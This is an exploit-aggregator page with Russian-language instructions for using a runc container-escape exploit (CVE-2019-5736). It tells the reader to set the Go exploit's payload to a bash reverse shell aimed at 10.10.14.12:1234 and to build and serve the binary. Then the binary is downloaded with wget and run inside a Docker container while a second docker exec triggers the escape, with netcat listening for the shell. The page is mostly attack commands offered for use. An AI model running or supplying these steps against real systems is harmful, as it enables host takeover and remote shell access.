Sploitus

Exploit for CVE-2019-5736

kitploit · 2026-08-25

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-H3X0V3RL0RD-CVE-2019-5736
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736

## Использование :

машина уязвима к CVE-2019-5736, следуйте шагам эксплойта Runc (CVE-2019-5736). Загрузите файл main.go, измените полезную нагрузку в файле на:

root@kitploit:~
    
    
      var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
    

После этого выполните:

root@kitploit:~
    
    
      go build main.go
    

Разместите HTTP-сервер:

root@kitploit:~
    
    
      python3 -m http.server
    

![image](https://assets.kitploit.com/production/public/readmes/26204/289d55287acfaad2f3977f05b7bdd986ff81bc9387de39ecfd69a6b8c57a536f.png)

Затем откройте 3 терминала, как показано ниже:

![image](https://user-images.githubusercontent.com/66146701/125002553-b4552480-e001-11eb-9ed4-1f78687a9e9.png)

root@kitploit:~
    
    
    Терминал 1
      sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
      wget http://10.10.14.12/main
      chmod +x main
      ./main
    
    Терминал 2
      sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
    
    Терминал 3
      nc -nlvp 1234
    

как только вы запустите ./main в первом SSH-терминале, сразу же выполните вторую команду во втором SSH-терминале, после чего вы получите обратный shell netcat в третьем терминале

![image](https://assets.kitploit.com/production/public/readmes/26204/2019c580648ac825334e1a851b630e92b300c833150d4b0598d832661571d538.png)